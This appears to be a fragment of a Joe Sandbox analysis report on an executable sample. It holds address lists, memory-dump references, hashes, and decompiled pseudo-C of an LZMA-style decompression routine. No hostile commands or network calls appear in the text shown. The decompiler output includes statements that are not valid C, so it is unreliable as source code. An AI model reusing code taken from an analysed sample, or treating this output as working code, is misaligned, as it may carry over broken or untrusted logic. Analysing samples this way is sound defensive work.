                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075e5
                                                          0x004075eb
                                                          0x004075ed
                                                          0x004075f4
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                          • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                          • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                          • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406FFE() {
                                                          				signed int _t539;
                                                          				unsigned short _t540;
                                                          				signed int _t541;
                                                          				void _t542;
                                                          				signed int _t543;
                                                          				signed int _t544;
                                                          				signed int _t573;
                                                          				signed int _t576;
                                                          				signed int _t597;
                                                          				signed int* _t614;
                                                          				void* _t621;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t621 - 0x40) != 1) {
                                                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                          						_t539 =  *(_t621 - 4) + 0x664;
                                                          						 *(_t621 - 0x58) = _t539;
                                                          						goto L68;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 8;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t621 - 0x54) = _t614;
                                                          							while(1) {
                                                          								L133:
                                                          								_t540 =  *_t614;
                                                          								_t597 = _t540 & 0x0000ffff;
                                                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          								if( *(_t621 - 0xc) >= _t573) {
                                                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          									 *(_t621 - 0x40) = 1;
                                                          									_t541 = _t540 - (_t540 >> 5);
                                                          									 *_t614 = _t541;
                                                          								} else {
                                                          									 *(_t621 - 0x10) = _t573;
                                                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          								}
                                                          								if( *(_t621 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t621 - 0x6c) == 0) {
                                                          									 *(_t621 - 0x88) = 5;
                                                          									L170:
                                                          									_t576 = 0x22;
                                                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                          									_t544 = 0;
                                                          									L172:
                                                          									return _t544;
                                                          								}
                                                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t542 =  *(_t621 - 0x84);
                                                          								while(1) {
                                                          									 *(_t621 - 0x88) = _t542;
                                                          									while(1) {
                                                          										L1:
                                                          										_t543 =  *(_t621 - 0x88);
                                                          										if(_t543 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                          											case 0:
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t543 =  *( *(_t621 - 0x70));
                                                          												if(_t543 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t547 = _t543 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t578);
                                                          												_push(9);
                                                          												_pop(_t579);
                                                          												_t617 = _t547 / _t578;
                                                          												_t549 = _t547 % _t578 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t612 = _t549 % _t579 & 0x000000ff;
                                                          												 *(_t621 - 0x3c) = _t612;
                                                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                          													L10:
                                                          													if(_t620 == 0) {
                                                          														L12:
                                                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t620 = _t620 - 1;
                                                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                          													} while (_t620 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t621 - 4) != 0) {
                                                          													GlobalFree( *(_t621 - 4));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t621 - 4) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t45 = _t621 - 0x48;
                                                          												 *_t45 =  *(_t621 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t621 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t555 =  *(_t621 - 0x40);
                                                          												if(_t555 ==  *(_t621 - 0x74)) {
                                                          													L20:
                                                          													 *(_t621 - 0x48) = 5;
                                                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t621 - 0x74) = _t555;
                                                          												if( *(_t621 - 8) != 0) {
                                                          													GlobalFree( *(_t621 - 8));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                          												 *(_t621 - 8) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                          												 *(_t621 - 0x84) = 6;
                                                          												 *(_t621 - 0x4c) = _t562;
                                                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                          												goto L132;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												_t67 = _t621 - 0x70;
                                                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                          												if( *(_t621 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t540 =  *_t614;
                                                          												_t597 = _t540 & 0x0000ffff;
                                                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          												if( *(_t621 - 0xc) >= _t573) {
                                                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          													 *(_t621 - 0x40) = 1;
                                                          													_t541 = _t540 - (_t540 >> 5);
                                                          													 *_t614 = _t541;
                                                          												} else {
                                                          													 *(_t621 - 0x10) = _t573;
                                                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          												}
                                                          												if( *(_t621 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												goto L0;
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t258;
                                                          												0 | _t258 = _t258 + _t258 + 9;
                                                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          												goto L75;
                                                          											case 0xa:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xb;
                                                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												L88:
                                                          												__ecx =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												L89:
                                                          												__eax =  *(__ebp - 4);
                                                          												 *(__ebp - 0x80) = 0x15;
                                                          												__eax =  *(__ebp - 4) + 0xa68;
                                                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          												goto L68;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
